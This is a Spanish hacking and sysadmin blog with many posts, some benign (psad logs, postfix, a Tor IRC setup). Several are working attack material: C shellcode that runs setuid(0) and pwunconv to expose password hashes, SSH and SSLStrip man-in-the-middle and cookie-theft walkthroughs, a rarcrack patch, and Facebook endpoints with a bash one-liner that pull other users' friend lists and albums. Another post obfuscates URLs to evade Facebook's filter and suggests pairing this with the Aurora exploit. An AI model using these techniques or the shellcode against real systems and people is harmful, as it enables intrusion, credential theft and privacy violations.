Oct 25 15:16:38 sid7 psad: src: 192.168.0.101 signature match: "MISC VNC communication attempt" (sid: 100202) tcp port: 5900
Oct 25 15:16:38 sid7 psad: src: 192.168.0.101 signature match: "MISC MS Terminal Server communication attempt" (sid: 100077) tcp port: 3389
Oct 25 15:16:38 sid7 psad: src: 192.168.0.101 signature match: "DOS MSDTC communication attempt" (sid: 1408) tcp port: 3372
Oct 25 15:16:38 sid7 psad: src: 192.168.0.101 signature match: "MISC Microsoft SQL Server communication attempt" (sid: 100205) tcp port: 1433
Oct 25 15:16:38 sid7 psad: scan detected: 192.168.0.101 -> 192.168.0.117 tcp: [10-10000] flags: SYN tcp pkts: 68 DL: 2

Todas las herramientas nombradas las he podido testear en un sistema corriendo Debian SID. Durante toda la entrada he enlazado las paginas oficiales de los proyectos, pero todos ellos se encuentran empaquetados en los repositorios oficiales de Debian, al menos en la rama sid. Para mas informacion siempre podremos acudir al buscador oficial de Debian.

Comentar que psad utiliza firmas del conocido IDS Snort y del venerable p0f. De vez en cuando puedo observar mensajes de syslog tal que asi:

Oct 25 21:29:44 sid7 psad: imported valid icmp types and codes
Oct 25 21:29:44 sid7 psad: imported p0f-based passive OS fingerprinting signatures
Oct 25 21:29:44 sid7 psad: imported TOS-based passive OS fingerprinting signatures
Oct 25 21:29:44 sid7 psad: imported original Snort rules in /etc/psad/snort_rules/ for reference info
Oct 25 21:29:44 sid7 psad: imported 205 psad Snort signatures from /etc/psad/signatures

A continuacion vemos un informe mas detallado en otro log similar recibido en mi correo y enviado por psad. Veremos que el FW descarta y loguea un total de 204 paquetes, que esta vez yo soy la IP 192.168.0.104 y el atacante es la 192.168.0.110 y que las caracteristicas de este log son muy similares a las del anterior, si no identicas, en las firmas detectadas por el IDS. Dos intentos de autenticacion, un intento de DoS y unos pocos sin catalogar. Todos ellos contra servicios inexistentes en mi maquina.

Este es el log recibido en el correo:

[psad-alert] DL3 src: 192.168.0.110 dst: 192.168.0.104
Recibidos  X
  
Responder

XXX.YYY@gmail.com para usuario 
mostrar detalles 01:28 (1 hora antes) 

=-=-=-=-=-=-=-=-=-=-=-= Sun Oct 31 01:28:40 2010 =-=-=-=-=-=-=-=-=-=-=-=


      Danger level: [3] (out of 5)

 Scanned TCP ports: [10-10000: 204 packets]
         TCP flags: [SYN: 204 packets, Nmap: -sT or -sS]
    iptables chain: INPUT (prefix "Shorewall:net2fw:DROP:"), 204 packets

            Source: 192.168.0.110
               DNS: [No reverse dns info available]

       Destination: 192.168.0.104
               DNS: [No reverse dns info available]

Overall scan start: Sun Oct 31 01:28:29 2010
Total email alerts: 1
Complete TCP range: [10-10000]
   Syslog hostname: sid7

      Global stats: chain:   interface:   TCP:   UDP:   ICMP:
                    INPUT    eth0         204    0      0


[+] TCP scan signatures:

"POLICY HP JetDirect LCD commnication attempt"
    dst port:  9100 (no server bound to local port)
    flags:     SYN
    sid:       568
    chain:     INPUT
    packets:   3
    classtype: misc-activity

"MISC VNC communication attempt"
    dst port:  5900 (no server bound to local port)
    flags:     SYN
    psad_id:   100202
    chain:     INPUT
    packets:   3
    classtype: attempted-admin

"MISC MS Terminal Server communication attempt"
    dst port:  3389 (no server bound to local port)
    flags:     SYN
    psad_id:   100077 (derived from: 1447 1448 2418)
    chain:     INPUT
    packets:   3
    classtype: misc-activity

"DOS MSDTC communication attempt"
    dst port:  3372 (no server bound to local port)
    flags:     SYN
    sid:       1408
    chain:     INPUT
    packets:   3
    classtype: attempted-dos

"MISC Microsoft SQL Server communication attempt"
    dst port:  1433 (no server bound to local port)
    flags:     SYN
    psad_id:   100205
    chain:     INPUT
    packets:   3
    classtype: attempted-admin

[+] Whois Information (source IP):
[cut]

Recibo un total de 4 mails de este tipo, enviados los 4 de golpe en un flush de la cola de correo segun puedo comprobar en los logs de syslog, que son irrelevantes para esta entrada. Si que tengo pendiente analizar el siguiente log de /var/log/messages

Oct 31 02:01:29 sid7 kernel: [  174.732092] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:29 sid7 kernel: [  174.812241] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:29 sid7 kernel: [  174.892391] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:29 sid7 kernel: [  174.972541] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:30 sid7 kernel: [  176.068854] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:30 sid7 kernel: [  176.149009] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:30 sid7 kernel: [  176.229154] martian destination 0.0.0.0 from 192.168.0.110, dev eth0
Oct 31 02:01:30 sid7 kernel: [  176.309299] martian destination 0.0.0.0 from 192.168.0.110, dev eth0

Si alguien conoce alguna alternativa a estos paquetes open source para detectar un escaneo de puertos se agradecen comentarios.

Suerte,

El peligro de las [flash]-cookies

2010-09-20T05:08:00.007+02:00

Examinando con la genial extension Live HTTP Headers lo que mandaba mi navegador a una web determinada, me encontre con lo siguiente:

POST /mochiSWF Referer: http://mochibot.com/my/core.swf?mv=5&fv=7&v=LNX%2010%2C1%2C82%2C76&swfid=46030122&l=10301&f=_level0&sb=remote

 Content-Type: application/x-www-form-urlencoded

 Content-Length: 766

 
 %5F%5Fmochibot=%5Btype+Function%5D&TAG=46030122&SV=7&MV=5&REF=&sb=remote&f=%5Flevel0&l=10301&swfid=46030122&v=LNX+10%2C1%2C82%2C76&fv=7&mv=5&lv=%5Flevel0%2E%5F%5Fmochibot%5F%5F46030122%2Elv&GUID=ebda978824f0903ca606498e5d96d3d5&SH=32&SW=1072&T=4756&TZ=%2D120&URL=...

Todo eso estaba mandando mi navegador al servidor de mochibot, de forma totalmente transparente para mi. Vemos en el contenido del paquete el SWF culpable: un fork del genial xspf musicplayer.

Tengo una debian sid con flare y una palabra clave: mochibot. Let's give a shot.

frame 1 {
    function playerLoad() {
      __com_mochibot__('46030122', this, 10301);
      fillColor();
      fillDefaults();
      fillOther();
    }

    function __com_mochibot__(swfid, mc, lv) {
      var x;
      var g;
      var s;
      var fv;
      var sb;
      var u;
      var res;
      var mb;
      var mbc;
      mb = '__mochibot__';
      mbc = 'mochibot.com';
      g = _global ? _global : _level0._root;
      if (g[mb + swfid]) {
        return g[mb + swfid];
      }
      s = System.security;
      x = mc._root.getSWFVersion;
      fv = x ? mc.getSWFVersion() : (_global ? 6 : 5);
      if (!s) {
        s = {};
      }
      sb = s.sandboxType;
      if (sb == 'localWithFile') {
        return null;
      }
      x = s.allowDomain;
      if (x) {
        s.allowDomain(mbc);
      }
      x = s.allowInsecureDomain;
      if (x) {
        s.allowInsecureDomain(mbc);
      }
      u = 'http://' + mbc + '/my/core.swf?mv=5&fv=' + fv + '&v=' + escape(/:$version) + '&swfid=' + escape(swfid) + '&l=' + lv + '&f=' + mc + (sb ? '&sb=' + sb : '');
      lv = fv > 6 ? mc.getNextHighestDepth() : (g[mb + 'level'] ? g[mb + 'level'] + 1 : lv);
      g[mb + 'level'] = lv;
      if (fv == 5) {
        res = '_level' + lv;
        if (!eval(res)) {
          loadMovieNum(u, lv);
        }
        return res;
      }
      res = mc.createEmptyMovieClip(mb + swfid, lv);
      res.loadMovie(u);
      return res;
    }

De mochibot.com :

MochiBot is a Flash traffic monitoring tool (similar to a hit counter) that tracks the performance of individual Flash content files (SWFs) no matter where they end up on the web. If your SWF is on 5 different servers, then MochiBot will count the number of views that SWF got for all 5 servers. It's perfect for tracking how viral your Flash content is.

* [Are they Pirates?]
See who's sharing your Flash content

Track how many websites your Flash content is hosted on (AKA, viral distribution).
* [You're a star!]
Track your performance

See if your Flash content's popularity is on the rise or taking a tumble.
* [Keep 'em coming back for more!]
How compelling is your content?

Find out if your audience is viewing your Flash content more just than once.
* [All eyes this way please]
Learn where your traffic is coming from

The Host Report gives traffic results for each website hosting your Flash content.
*
Never worry about Flash Pirates again

MochiBot knows where your Flash files are at all times so that you don't have to.

Eso es lo que esta chivandose de nosotros a mochibot. Despues me di cuenta de que el fork es open source, y yo trasteando con flare para encontrar el bicho.

Una defensa desde la parte del servidor seria reemplazar los SWF "maliciosos" por los swf originales de sourceforge en la URL http://musicplayer.sourceforge.net/ y todo solucionado. Pongo maliciosos entre comillas porque es de gran ayuda en una investigacion cualquier rastro, pero nosotros no somos criminales y no queremos dejar rastro. Bueno, seamos realistas, hasta donde podamos queremos defender nuestra privacidad en la red todo lo posible.

Por cierto, una extension de FF que elimina cookies Flash es BetterPrivacy, muy recomendable.

Para los que no useis Firefox, y para los que lo useis tambien, os puede servir bleachbit, es como el ccleaner pero mas potente. Es capaz de borrar falsh-cookies ademas de muchos otros elementos. Genial.

Y siempre podemos entrar a la pagina oficial de Adobe a controlar las preferencias sobre las Flash-cookies

Suerte,

Falsos positivos en rarcrack

2010-08-21T12:46:00.003+02:00

A mi rarcrack me estaba dando falsos positivos, asi que esto es lo que hice.

~Comprobar la cadena que devuelve el .rar de ejemplo al pasarle un password correcto:

$ unrar t -y -p100 test.rar

UNRAR 3.90 beta 2 freeware      Copyright (c) 1993-2009 Alexander Roshal


Testing archive test.rar

Testing     LICENSE                                                   OK 
All OK

Esa es la cadena: "All OK".

~Editar rarcrack.c:

Sustituir:
if (strcasestr(ret, "ok") != NULL) {
por
if (strstr(ret, "All OK") != NULL) {

La funcion strcasestr no es sensible a mayusculas / minusculas, no esta optimizada. Cambiar por strstr

~Compilar de nuevo:

make
sudo make install

De todas formas es leeeeeento este rarcrack. Como alternativa tenemos por ejemplo a cRARk

Taller WIFI por Vic_Thor

2010-08-14T20:21:00.001+02:00

Excelente, para variar:

http://www.wadalbertia.org/foro/viewtopic.php?f=7&t=5589

MitM contra sshv2 con jmitm2 (sin downgrade a sshv1)

2010-08-13T06:46:00.022+02:00

~0~ Escenario:

sshd: Ubuntu 10.04 x64 ~ 192.168.1.100

Victima: BT4 Final ~ 192.168.1.101

Atacante: BT4-R1 ~ 192.168.1.103

~1~ Atacante se baja jmitm2 y lo configura:

~2~ Atacante inicia jmitm2 y hace ARP-spoof (bidireccional) con ettercap:

~3~ Victima se conecta al server sshd y Atacante captura las credenciales sin cortar la comunicacion (MitM):

Nota: El exito del ataque depende totalmente de que la victima acepte el WARNING de que las claves RSA han cambiado (evidente).

Y todo esto viene a raiz de un hilo que respondi en el mejor foro de seguridad del mundo.

Taller de TCP/IP de Vic_Thor

2010-08-06T18:42:00.005+02:00

Excelente PDF de Vic_Thor. Podeis descargarlo de la direccion oficial de Wadalbertia.

Oldie but goodie

Suerte,

SASL + TOR en Freenode [irssi]

2010-07-29T11:58:00.005+02:00

~TOR a traves de SOCKS:

/etc/init.d/tor start
socat TCP4-LISTEN:7777,fork SOCKS4A:127.0.0.1:p4fsi4ockecnea7l.onion:6667,socksport=9050 &

El _unico_ nodo de salida TOR autorizado por Freenode puede verse lanzando la siguiente consulta:

dig +short irc.tor.freenode.net cname

~Instalar SASL:

mkdir -p ~/.irssi/scripts/autorun
wget http://www.freenode.net/sasl/cap_sasl.pl -P ~/.irssi/scripts/
ln -s ~/.irssi/scripts/cap_sasl.pl ~/.irssi/scripts/autorun/

~Habilitar SASL en irssi:

/server add -ssl -network freenodetor localhost 7777
/load perl
/sasl set freenodetor tu_nick tu_password DH-BLOWFISH
/sasl save
/save

~Comprobar ~/.irssi/config:

{
 address = "localhost";
 chatnet = "freenodetor";
 port = "7777";
 use_ssl = "no";
 ssl_verify = "no";
 autoconnect = "no";
}

~Having fun

torify irssi

Print your blog. Blog to PDF

2010-07-26T23:28:00.017+02:00

Empezo siendo gratuito obtener el PDF, despues lo hicieron de pago, y aqui decidi no decir que en la cache del navegador se podia encontrar el PDF.

Bien, acabo de probarlo de nuevo, y ahora guarda en la cache un PDF por pagina, y con nombres aleatorios, asi que no podemos tirar de herramientas como el bello pdftk para unir las paginas. Asi que, antes de hacer trampas, he probado otras alternativas como rss2pdf, aunque con esta ultima no he conseguido imprimir las imagenes, ni siquiera jugando con firebug para alterar las opciones validadas en el lado del cliente.

Bueno, a base de probar cosas he conseguido bajar el pdf registrandome, guardando el pdf con las imagenes por defecto de portada y contraportada, logeandome, cambiando las imagenes y... y ahi va mi primer video del blog:

No soy diseñador, asi que no ha quedado profesional ni mucho menos, pero creo que se ve la idea, que es encontrar la ruta del servidor web donde se almacena el PDF.

Suerte,

Analisis Forense de routers Cisco

2010-07-18T20:26:00.001+02:00

# terminal length 0
# dir /all
# show clock detail
# show ntp
# show version
# show running-config
# show startup-config
# show reload
# show ip route
# show ip arp
# show users
# show logging
# show interfaces
# show ip interfaces
# show access-lists
# show tcp brief all
# show ip sockets
# show ip nat translations verbose
# show ip cache flow
# show ip cef
# show snmp users
# show snmp groups
# show clock detail
# exit

Bot IRC que dice titulos de youtubes que escriben los usuarios

2010-07-15T07:27:00.008+02:00

#!/bin/bash

# ~ v0.1 ~ 15-7-2010 
# ~ vlan7 ~ http://www.vlan7.org

NICK=vlan7bot
SERVER=${1:-dune.irc-hispano.org}
CANAL=${2:-#canal}

echo "NICK $NICK" >input
echo "USER $NICK $NICK $NICK :$0" >>input
tail -f input | telnet $SERVER 6667 | \
while true
do read LINE #|| break
  echo $LINE
  if echo $LINE |grep "PING" &>/dev/null
  then echo "PONG $LINE" >>input
    echo "JOIN $CANAL" >>input #***sacar esto de aqui!!!
    echo "MODE $NICK +c" >>input #***sacar esto de aqui!!!
  fi
  if echo $LINE |grep -i "youtube.com" &>/dev/null
  then
    LINE=$(echo $LINE |grep -o "www.youtube[^ ]*")
    echo "PRIVMSG $CANAL : $(curl ${LINE%&*} 2>&1 |grep -iA2 '<title>' |grep '-' |sed 's/^- //')" >>input
  fi
done

Suerte,

EDITO parta decir que el compañero zcom ha testeado OK el bot en #RSecurity en IRC de freenode, y que estais todos invitados al canal que el mismo fundo en su dia.

Analizadores de vulnerabilidades

2010-06-26T18:45:00.004+02:00

chanchi me envia un PDF sobre analizadores de vulnerabilidades, practico en sus propios sistemas.

Ahi va el enlace

Gracias chanchi, para la proxima queremos metasploit :)

DIGITAL FORENSIC WAR GAME

2010-05-06T20:21:00.005+02:00

Me entero por un compañero de uno de mis foros favoritos, Wadalbertia, de este wargame de forense.

Los 2 primeros niveles son asequibles, el reto esta bien, aunque me temo que el tercer nivel se me va a resistir, si es que consigo pasarlo claro...

Ahi va la URL:

http://real-forensic.com/

Suerte!

/dev/tcp en Ubuntu 9.10 karmic

2010-03-11T18:30:00.005+01:00

Basicamente hay que recompilar bash con la opcion

--enable-net-redirections

Para despues proceder a crear los dispositivos /dev/tcp y /dev/udp con sus correspondientes valores:

#Create /dev/tcp and /dev/udp devices.
/usr/bin/sudo mknod /dev/tcp c 30 36
/usr/bin/sudo mknod /dev/udp c 30 39

Y testearlo:

#Test
cat </dev/tcp/time.nist.gov/13 && echo 'All ok. Enjoy!'

Como no voy a reinventar la rueda, he adaptado el script que se puede encontrar en los comentarios de esta entrada del Linux Journal.

Mas que nada porque he cambiado recientemente a ubuntu 9.10 y me interesaba practicar el segundo PDF de las Ninjitsu Series, que trata basicamente de usar netcat "sin usar netcat".

Ahi va el script:

#!/bin/bash
# Written by Joseph E. Tole 09/29/09
# Updated by G. Geurts 09/30/09
# Updated by vlan7 03/11/10
# /dev/tcp on Ubuntu.
# Tested against Ubuntu 9.10 x64, bash 4.0.x
# Enjoy!

# This creates and then changes to a new temporary directory. mktemp should always be used to avoid accidently using an active file/dir.
bash_source="$(/bin/mktemp -d)"
cd "${bash_source}"

# Install the bash source.
apt-get source bash

# Dependencies
# The -y flag causes apt-get to assume you said yes and not prompt for y/n to install
/usr/bin/sudo apt-get build-dep -y bash
/usr/bin/sudo apt-get install -y dpkg-dev fakeroot
cd bash-*

# This line changes the rules file which has the configure script options predefined in it. This causes the compile to now include network support.
/bin/sed -e 's/--disable-net-redirections/--enable-net-redirections/' -i debian/rules

# This creates new .deb packages for bash which is several but we only need to install one since the others are copies of what is already installed.
/usr/bin/dpkg-buildpackage -rfakeroot

# Install the .deb. The asterisk is used for architecture independence. In my case it * matches _amd64 but this may be different on non x64 systems.
/usr/bin/sudo /usr/bin/dpkg -i ../bash_*.deb

# The line below puts bash on hold within the package manager so that it is not automatically upgraded. If it is then you will lose this functionality.
echo 'bash hold' | /usr/bin/sudo /usr/bin/dpkg --set-selections

#Create /dev/tcp and /dev/udp devices.
/usr/bin/sudo mknod /dev/tcp c 30 36
/usr/bin/sudo mknod /dev/udp c 30 39

#Test
cat </dev/tcp/time.nist.gov/13 && echo 'All ok. Enjoy!'

Suerte!

Privacy Security Freedom

2010-02-03T17:49:00.004+01:00

Para saltarse restricciones puestas sobre inet en paises autoritarios y censuradores como China.

O para usar en WIFIs publicas por razones de seguridad y privacidad.

http://thefreevpn.com/
http://www.ultrareach.com/
http://www.hotspotshield.com/

Suerte,

sɐɹqo ǝp soɯɐʇsǝ

2010-01-21T19:24:00.008+01:00

Buenas,

Estoy cambiando el aspecto del blog para que sea algo mas atractivo si cabe.

De paso estoy aprovechando para revisar las entradas, formatear codigo, añadir etiquetas, etc. Todo ello en ratos muertos... Importante es que ha cambiado el RSS.

Tambien estoy en proceso de configuracion de un dominio para el blog.

http://www.vlan7.org

Y para que esta no sea la primera y unica entrada sin nada mas o menos tecnico, decir que descubri SyntaxHighlighter, a fully functional self-contained code syntax highlighter developed in JavaScript

Suerte,

Ver cosas que no debes en Facebook

2010-01-19T10:29:00.025+01:00

Bueno, visto que los de Facebook pasan de mi ante cualquier hack que les reporto, los publico aqui, aunque son bobadas la mayoria, todo hay que decirlo:

El mitico fallo ese de ver fotos ajenas aqui esta arreglado. Pero hagamos un poco de memoria. Solo servia para los perfiles con pesimas configuraciones de privacidad. Si tu en tu perfil especificabas que un album solo podian verlo tus amigos, entonces no habia tal bug.

Bien, he encontrado otra manera de acceder a los albumes de cualquiera que los tenga configurados con una privacidad pesima. Recordemos que todo lo que hayas publicado en el pasado _mantiene_ la configuracion de privacidad establecida en su momento. Es por esto que los usuarios que publicaron albumes con las pesimas opciones por defecto de la vieja politica de privacidad, siguen teniendo sus fotos accesibles.

Bien, el vector de ataque:

http://www.facebook.com/ajax/profile/tab.php?id=[AQUI_EL_uid]&v=photos&__a=1

Y ahi, buscad en ese tocho de JSON la URL de cada album. Debemos estar logueados en facebook.

Podeis probar por ejemplo con el uid numero 4, que es el del creador del Facebook.

theharmonyguy propone un excelente javascript que podemos usar para ver con mas comodidad las fotos:

javascript:(function(){function%20y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval('('+q+')');document.getElementById('tab_canvas').innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new%20window.XMLHttpRequest:(window.ActiveXObject?new%20ActiveXObject("MSXML2.XMLHTTP"):null);x.onreadystatechange=y;x.open('POST','http://www.facebook.com/ajax/profile/tab.php',true);x.send('id='+ProfileURIController._profileId+'&v=photos&__a=1');})()

Podemos introducirlo como direccion en nuestros marcadores. Asi simplemente seleccionando el marcador mientras estamos viendo el perfil de alguien, se nos mostraran todas las portadas de los albumes (visibles segun su privacidad). Haciendo clic en cada una de las portadas accederemos al contenido de ese album.

~

Aun hay mas señores.

Private IP disclosure:

Sin necesidad de iniciar sesion:

El vector de ataque:

http://www.facebook.com/ajax/presence/reconnect.php?reason=7&iframe_loaded=false&__a=1

Y ahi buscad los .js, abridlos en el navegador y vereis unas bonitas IPs privadas, que de nada sirven, pero bueno.

~

Mas.

Conocer la lista de todos los amigos de CUALQUIERA

Sin necesidad de estar logueado.

Aunque desmarques la casilla de que todos puedan ver tu lista de amigos.

Esto no descubierto por mi.

http://www.facebook.com/ajax/typeahead_friends.php?u=[AQUI_EL_uid]&__a=1

Ya que esto no lo descubri por mi mismo, lo que si que he hecho es una linea de bash para obtener los resultados del JSON un poco mas legibles:

lynx -useragent=Opera -dump 'http://www.facebook.com/ajax/typeahead_friends.php?u=4&__a=1' |gawk -F'\"t\":\"' -v RS='\",' 'RT{print $NF}' |grep -v '\"n\":\"' |cut -d, -f2

Podria hacer mas filtrados, pero ya veis la idea...

<EDIT>
Parece ser que esto ha cambiado, pues ahora si ademas desmarcas la casilla de que no puedas ser encontrado en busquedas, en el control de privacidad, facebook no devuelve nada.

Me he enterado tras enviar este comando a commandlinefu.com
</EDIT>

Disponemos tambien aqui de una web para conocer estos datos online, con los mismos prerrequisitos. Gracias a Mathias de commandlinefu.com.

Mas.

Burlando al parser de Facebook

Esta direccion esta prohibida en Facebook:

http://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=www.vlan7.org

Asi no:

http://www.facebook.com/l.php?_fb_noscript=1&u=https://www.facebook.com/l.php?_fb_noscript=1&u=www.vlan7.org

Mas burlas al parser de Facebook.

Como publicar cualquier URL baneada por Facebook en nuestro muro

Basta convertir (ofuscar) la URL convirtiendola a un entero de 32 bits. Fravia+ (RIP) y mas gente escribieron sobre ello en una pagina de su sitio web llamada How to Obscure Any URL. Y para los que no se nos den bien las matematicas tenemos paginas como:

http://funkyfilters.com/url/obfuscation

Por ejemplo, asi salta un pop-up diciendo que el contenido es ofensivo y no podemos publicarlo:

http://www.facebook.com/l.php?u=http://www.facebook.com/l.php?u=http://www.facebook.com/l.php?u=www.vlan7.org

Y asi lo burlamos y conseguimos publicar lo que nos de la gana:

http://1161803024/l.php?u=http://1161803024/l.php?u=http://1161803024/l.php?u=www.vlan7.org

¿Para que puede servirnos esto? mmm ¿y si lo combinamos con Metasploit y algun exploit como el Aurora? ^^

Existen algunas webs marcadas como spam por facebook. Por ejemplo yo no puedo compartir mi blog en FB. Me lo salto por ejemplo asi:

http://www.stayincognito.com/nph-proxy.cgi/000100A/http/www.vlan7.org/

La seguridad por oscuridad no es seguridad. [Paros es bello]

Suerte,

Wireless Distribution System (WDS)

2009-12-03T04:25:00.008+01:00

Se que esto es algo basico, pero me lo apunto para tenerlo en cuenta en el futuro.

Para distribuir la señal entre varios APs a lo largo de un edificio, quizas lo ideal seria usar WDS, que lo que permite basicamente es la interconexion de varios APs que actuarian en "modo repetidor" de la señal entre ellos.

Basicamente se tienen que cumplir las siguientes condiciones:

Todos los APs tienen que operar en el mismo canal.
El ESSID de cada uno debe ser distinto, con el fin de que cada equipo sepa en cada momento a que AP esta asociado.
En cuanto a la seguridad, puedes usar WEP/WPA y filtrado por MAC sin problemas.
Cada AP se comunica mediante los demas por los BSSIDs (direcciones MAC) de los demas APs, por lo que de alguna manera hay que especificarlo en cada uno.

Estos 4 puntos deben cumplirse siempre para un correcto funcionamiento de WDS.

Una vez implementado WDS, el proceso de asociacion de una maquina a un determinado AP es totalmente transparente para el usuario, solo hay que realizar cambios en los APs.

unshadow.c shellcode

2009-07-05T00:13:00.012+02:00

Esta shellcode deshabilita el shadowing en un sistema Linux. Todos los passwords de /etc/shadow van a /etc/passwd , legible por todo el mundo :)

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
  "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
  "\x99" //cdq
  "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
  "\xb0\x0b" //mov al,0bh
  "\x52" //push edx /Termina la cadena con un 0
  "\x68\x63\x6f\x6e\x76" //push dword "conv"
  "\x68\x70\x77\x75\x6e" //push dword "pwun"
  "\x68\x62\x69\x6e\x2f" //push dword "bin/"
  "\x68\x73\x72\x2f\x73" //push dword "sr/s"
  "\x68\x2f\x2f\x2f\x75" //push dword "///u"
  "\x89\xe3" //mov ebx,esp
  "\x89\xd1" //mov ecx,edx
  "\xcd\x80"; //int 80h

void main()
{
  printf("\n~ This shellcode disables shadowing on a linux system ~"
    "\n\n\t ~ Coded by vlan7 ~"
    "\n\t ~ http://www.vlan7.org ~"
    "\n\n ~ Date: 4/Jul/2009"

    "\n\tYou'll have the passwords stored in /etc/passwd."
    "\n\tFor undo purposes use the pwconv command."
    "\n\t ~ Cheers go to: Wadalbertia"
    "\n\t ~ Shellcode Size: %d bytes\n\n",
    sizeof(sc)-1);

    (*(void (*)()) sc)();
}

<EDIT>
No es correcta tanta optimizacion, la shellcode fue escrita sin probarla en la practica en un exploit. Si no eres ya root, da un Segmentation Fault "asin" de grande. Todo por ahorrar un byte aprovechandose de que el retorno de una funcion se guarda en EAX.
</EDIT>

Ahi va la correcta, de 1 byte mas, aunque pendiente de probar en la practica, deberia funcionar con toda seguridad:

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
  "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
  "\x99" //cdq
  "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
  "\x8d\x43\x0b" //LEA eax,[ebx + 0x0b]
  "\x52" //push edx /Termina la cadena con un 0
  "\x68\x63\x6f\x6e\x76" //push dword "conv"
  "\x68\x70\x77\x75\x6e" //push dword "pwun"
  "\x68\x62\x69\x6e\x2f" //push dword "bin/"
  "\x68\x73\x72\x2f\x73" //push dword "sr/s"
  "\x68\x2f\x2f\x2f\x75" //push dword "///u"
  "\x89\xe3" //mov ebx,esp
  "\x89\xd1" //mov ecx,edx
  "\xcd\x80"; //int 80h

void main()
{
  printf("\n~ This shellcode disables shadowing on a linux system ~"
    "\n\n\t ~ Coded by vlan7 ~"
    "\n\t ~ http://www.vlan7.org ~"
    "\n\n ~ Date: 4/Jul/2009"

    "\n\tYou'll have the passwords stored in /etc/passwd."
    "\n\tFor undo purposes use the pwconv command."
    "\n\t ~ Cheers go to: Wadalbertia"
    "\n\t ~ Shellcode Size: %d bytes\n\n",
    sizeof(sc)-1);

    (*(void (*)()) sc)();
}

postfix + logrotate

2009-06-27T10:00:00.009+02:00

LOGUEANDO 2 INSTANCIAS DE POSTFIX EN 2 ARCHIVOS DIFERENTES:
=======================================================

/etc/postfix/main.cf

syslog_facility=local1
syslog_name=postfix_smtpExtern

/etc/postfix-out/main.cf

syslog_facility=local2
syslog_name=postfix_smtpIntern

/etc/rsyslog.conf

# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;authpriv.none;cron.none;local1.none;local2.none /var/log/messages
(...)
local2.* -/var/log/smtpdIntern.log
local1.* -/var/log/smtpdExtern.log

Reiniciar demonios

/etc/init.d/rsyslog restart
/etc/init.d/postfix restart
/etc/init.d/postfix-out restart

ROTANDO LOS 2 ARCHIVOS DE LOG CON LOGROTATE:
========================================

/etc/logrotate.d/syslog (Postfix usa syslog)

/var/log/smtpdIntern.log {
  sharedscripts
  missingok
  weekly
  compress
  # delaycompress
  create
  postrotate
  /etc/init.d/rsyslog restart
  /etc/init.d/postfix-out reload
  endscript
  rotate 12
  mail user@host.com
}

/var/log/smtpdExtern.log {
  sharedscripts
  missingok
  weekly
  compress
  # delaycompress
  create
  weekly
  postrotate
  /etc/init.d/rsyslog restart
  /etc/init.d/postfix reload
  endscript
  rotate 12
  mail user@host.com
}

COMPROBACION FORZANDO ROTACIONES CON LOGROTATE:
===============================================

/usr/sbin/logrotate --force /etc/logrotate.d/syslog

WPA + TKIP. Probando con tkiptun-ng

2009-06-24T20:58:00.009+02:00

http://www.wadalbertia.org/foro/viewtopic.php?p=55867

Gracias a Vic_Thor por la info _de primera mano_, pues es muy dificil encontrar informacion sobre esta herramienta.

Ah, salio la version 1.0 para win, aunque no la he probado.

Jugando a robar cookies con surfjack

2009-06-23T10:49:00.017+02:00

Hola,

Hace tiempo, cuando escribi un post sobre Sidejacking con hamster y ferret, Sor_Zitroen me mando un documento para incluirlo como enlace. El documento se titulaba Surfjacking. https will not save you.

A mi se me paso incluirlo, hoy lo vi y a esto es a lo que he podido llegar. A estar logeado en este ejemplo en los foros de Wadalbertia sin logearme, es decir, sin introducir user/pass.

El atacante envenena a la/s victima/s haciendole/s creer que el es el router, mediante un ataque arp-spoofing que todos aqui sabemos como funciona:

Ya estas pasando por mi.

Podria explicar un poco mas esto que hace el atacante, pero os dejo jugar un poco...

Pista: Ejecutad primero surfjack y os generara un INI por defecto, que podreis editar.

El atacante ve que la victima esta logeada:

Entonces, que no viene en el README esto tampoco: Apuntamos el navegador al proxy local donde escucha surfjack (fijaos en que puerto escucha, el propio surfjack lo dice ;)) y tras escribir en el navegador del atacante:

http://setcookies

el navegador nos respondera con un:

Entonces yo segui con mi papel de atacante, me dirigi a wadalbertia y ya estaba logeado :)

Espero que os haya gustado si no lo conociais.

Suerte,

Jugando y burlando a SSL con SSLStrip

2009-06-22T12:48:00.016+02:00

No tengas miedo, solo ve hacia adelante y juega

Hola!

¿Quien de nosotros escribe https en el navegador para llegar a una pagina https?

Apuesto a que ninguno lo hacemos.

¿Como llega la gente normalmente a una pagina https pues?

A traves de enlaces o de redirecciones (302).

Bien, aqui entra en juego SSLStrip, una herramienta que automatiza el proceso de realizar un ataque MitM contra estos 2 tipos de llegada a una conexion SSL.

En otras palabras, atacaremos la conexion http en lugar de la conexion https...

Musica maestro.

Primero un screenshot con la configuracion de la victima:

Bien. El atacante deberia comenzar el ataque asi:

Con el primer comando activamos el forwarding.

El segundo comando es una regla de iptables que redirige todo el trafico del puerto 80 al 10000.

Puede ser otro, siempre que seamos coherentes y se lo digamos a sslstrip en el tercer comando que aparece en la captura.

Llamando asi a sslstrip, la victima no recibe ninguna advertencia de certificado y ademas el favicon es un candado, con lo cual la posibilidad de engaño es mayor.

Bien, ahora tenemos que lanzar un ataque de ARP-poisoning. Yo he elegido ettercap.

Ya estas pasando por mi.

Una vez hecho esto, cuando la victima ingresa a paypal lo unico diferente es que en la URL aparece http en lugar de https, mirad:

Y ahora, el atacante mata el proceso de sslstrip con un CTRL+C.

